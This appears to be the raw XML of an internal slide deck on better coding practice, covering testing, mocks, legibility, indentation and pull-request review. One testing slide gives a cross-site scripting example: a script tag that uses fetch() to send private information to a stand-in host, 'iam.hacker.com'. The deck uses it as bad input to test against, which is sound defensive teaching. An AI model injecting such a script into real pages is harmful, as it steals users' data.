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97786-C9EE-AB47-902F-72B0C9F3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5920896" cy="3546179"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6100"/>
              <a:t>Develop Better Code at Thomson Reuters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3DF9-EA74-1849-A81A-117687A9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5920894" cy="704088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or how to impress your 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74F60E92-6F09-4EE4-9B46-90AAABA5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r="26228"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556686" y="10"/>
            <a:ext cx="4635314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023" y="783134"/>
            <a:ext cx="5057954" cy="948662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testing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Defective code,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Fool-proofing (no offence), Look there is even a definition in the dictionary!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/dictionary/foolproof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holes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Legibility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against bad input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Input that is too long. Does it crash the database?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- What happens if blank input is sent?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- What happens if UTF-8 is enabled and we send a weird character?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What happens if the user writes this input into the database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>crossorigin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>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  fetch("https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>iam.hacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>", { "info": "all your private information" }); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier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886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Mocks can be used to change the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of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Unfortunately, some tests need mocks because they are tied to an external system such as HTTP requests or a database. Using mocks can help bypass the code that uses the external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am not a proponent of mocks because they can trick you into believing your code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AEM we use Mockito, https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>site.mockito.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty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JavaScript/TypeScript we use Jest, https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jestjs.io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381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D66-A71E-5840-BBCE-2141326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925752" cy="475488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99F-0F50-FD4A-A37D-A5B6B92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758952"/>
            <a:ext cx="5745296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When unsure, please check the reference. Say you are using jQuery, which we so happen to use a lot in AEM, please check https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jquery.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for documentation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. Better yet, find out the version first. For jQuery use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>$.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>fn.jquery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Verify its tests. Is it covering enough cases?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is the code legible?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does the code follow the SOLID principles?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read the associated Jira Issue. Does it solve the problem?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is there similar code in the codebase that can be leveraged?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is user input encoded correctly (for database storage, file storage)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can user input cause a stack overflow exception (infinite loop)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What would happen if the user inputs a file that is too large?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does the code have side-effects?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660C-087A-CF46-95FF-A6B4DE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Bad Coding Practices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380-5B28-9B46-B605-F121D0E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1BC-6318-5041-98A3-F5400E2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826120" cy="5983371"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general we use spaces instead of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Very few languages prefer Tabs, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Go</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advantage of spaces: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Code looks uniform across IDEs, editors, computers,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Easy to align method, or attributes.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hello_my_man</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(name,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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>does_he_like_playdough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Advantages of tabs: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Users choose how the code is formatted on their machine. You might like four spaces, but your colleague Bob prefers two.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3979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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code should be easy to read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classes should follow the SOLID principles, https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en.wikipedia.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/wiki/SOLID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Think of Classes as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>noun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, as in: what is it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Think of Methods as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>verb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, as in: what does it do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods should be short, 5 - 10 lines (in Ruby/TypeScript), 10 - 20 lines (in C#/Java)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> produce side-effects unless it is explicitly named such. E.g.,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modify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319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Ternary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ternary operators within expressions.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`Hello ${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name : "Bob"}`;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1707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return `Hello ${name}`;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"Hello Bob";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28422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(Less) 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`Hello ${name}` : "Hello Bob";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="846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In general, write Test-driven Development code, because it helps to ensure the SOLID principles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. Write as many edge-cases as possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. Use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 annotation in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>JUnit 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>junit.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/junit5/docs/current/user-guide/#writing-tests-parameterized-tests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269408546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694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Courier</vt:lpstr>
      <vt:lpstr>Sitka Banner</vt:lpstr>
      <vt:lpstr>HeadlinesVTI</vt:lpstr>
      <vt:lpstr>Develop Better Code at Thomson Reuters</vt:lpstr>
      <vt:lpstr>Bad Coding Practices</vt:lpstr>
      <vt:lpstr>Indentation</vt:lpstr>
      <vt:lpstr>Maintainability</vt:lpstr>
      <vt:lpstr>Legibility</vt:lpstr>
      <vt:lpstr>Legibility</vt:lpstr>
      <vt:lpstr>Legibility</vt:lpstr>
      <vt:lpstr>Legibility</vt:lpstr>
      <vt:lpstr>Testing</vt:lpstr>
      <vt:lpstr>Testing Benefits</vt:lpstr>
      <vt:lpstr>Mocks</vt:lpstr>
      <vt:lpstr>Documentation</vt:lpstr>
      <vt:lpstr>Good PR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Better Code at Thomson Reuters</dc:title>
  <dc:creator>Ofer, Dan J. (TR Technology)</dc:creator>
  <cp:lastModifiedBy>Ofer, Dan J. (TR Technology)</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-22T20:03:29Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-22T20:34:14Z</dcterms:modified>
</cp:coreProperties>
</file>